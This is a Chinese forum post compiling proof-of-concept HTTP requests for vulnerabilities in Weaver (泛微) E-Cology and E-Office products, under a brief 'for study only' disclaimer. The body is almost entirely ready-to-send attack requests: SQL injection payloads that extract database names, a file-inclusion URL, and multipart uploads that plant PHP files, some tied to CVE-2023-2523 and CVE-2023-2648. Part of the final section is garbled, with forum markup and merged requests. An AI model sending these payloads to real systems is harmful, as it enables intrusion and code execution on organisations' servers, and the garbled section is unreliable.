泛微漏洞 PoC 整理

吉沃运营专员

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

泛微 E-Cology 某版本 SQL 注入漏洞

1. POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
   
2. Host: xxx.xxx.xxx.xxx:port
   
3. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
   
4. Connection: close
   
5. Content-Length: 189
   
6. Content-Type: text/plain
   
7. Accept-Encoding: gzip
   
8. 
   
9. callCount=1
   
10. page=
    
11. httpSessionId=
    
12. scriptSessionId=
    
13. c0-scriptName=DocDwrUtil
    
14. c0-methodName=ifNewsCheckOutByCurrentUser
    
15. c0-id=0
    
16. c0-param0=string:1 AND 1=1
    
17. c0-param1=string:1
    
18. batchId=0

复制代码

泛微 HrmCareerApplyPerView SQL 注入漏洞

1. GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
   
2. Host: 127.0.0.1:7443
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
   
4. Accept-Encoding: gzip, deflate
   
5. Connection: close

复制代码

泛微 ShowDocsImage SQL 注入漏洞

1. GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
   
2. Host: 127.0.0.1
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
   
4. like Gecko)
   
5. Accept-Encoding: gzip, deflate
   
6. Connection: close

复制代码

泛微 Weaver E-Office9 前台文件包含

1. http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

复制代码

泛微 E-Office uploadify.php 后台文件上传漏洞

上传文件所在路径：/attachment/3466744850/xxx.php

1. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
   
4. Connection: close
   
5. Content-Length: 259
   
6. Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
   
7. Accept-Encoding: gzip
   
8. 
   
9. --e64bdf16c554bbc109cecef6451c26a4
   
10. Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
    
11. Content-Type: image/jpeg
    
12. 
    
13. <?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>
    
14. 
    
15. --e64bdf16c554bbc109cecef6451c26a4--

复制代码

泛微 E-Office9 文件上传漏洞 CVE-2023-2523

1. POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
   
2. Host:xxx.xxx.xxx.xxx:port
   
3. Cache-Control:max-age=0  
   
4. Upgrade-Insecure-Requests:1  
   
5. Origin:null  
   
6. Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  
   
7. Accept-Encoding:gzip, deflate
   
8. Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
   
9. Connection:close
   
10. 
    
11. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    
12. Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
    
13. Content-Type:image/jpeg
    
14. <?phpphpinfo();?>
    
15. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

复制代码

泛微 E-Office9 文件上传漏洞 CVE-2023-2648

1. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
   
2. Host: 192.168.233.10:8082
   
3. User-Agent: test
   
4. Connection: close
   
5. Content-Length: 493
   
6. Accept-Encoding: gzip
   
7. Content-Type: multipart/form-data
   
8. 
   
9. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
   
10. Content-Disposition: form-data; name="Filedata"; filename="666.php"
    
11. Content-Type: application/octetstream
    
12. 
    
13. <?php phpinfo();?>
    
14. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt[/h2]
    
15. [h2]泛微 Weaver E-Office9.0 文件上传[/h2]
    
16. [code]POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
    
17. Host: xxx.xxx.xxx.xxx:port
    
18. User-Agent: test
    
19. Connection: close
    
20. Content-Length: 493
    
21. Accept-Encoding: gzip
    
22. Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
    
23. 
    
24. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
    
25. Content-Disposition: form-data; name="Filedata"; filename="666.php"
    
26. Content-Type: application/octet-stream
    
27. 
    
28. <?php phpinfo();?>
    
29. 
    
30. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
    
31. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
    
32. Content-Disposition: form-data; name="file"; filename=""
    
33. Content-Type: application/octet-stream
    
34. 
    
35. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
    
36. 
    
37. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
    
38. Host: xxx.xxx.xxx.xxx:port
    
39. User-Agent: test
    
40. Connection: close
    
41. Content-Length: 493
    
42. Accept-Encoding: gzip
    
43. Content-Type: multipart/form-data
    
44. 
    
45. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    
46. Content-Disposition: form-data; name="Filedata"; filename="666.php"
    
47. Content-Type: application/octet-stream
    
48. 
    
49. <?php phpinfo();?>
    
50. 
    
51. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

复制代码

xulongzhuiyi

这次漏洞有点多奥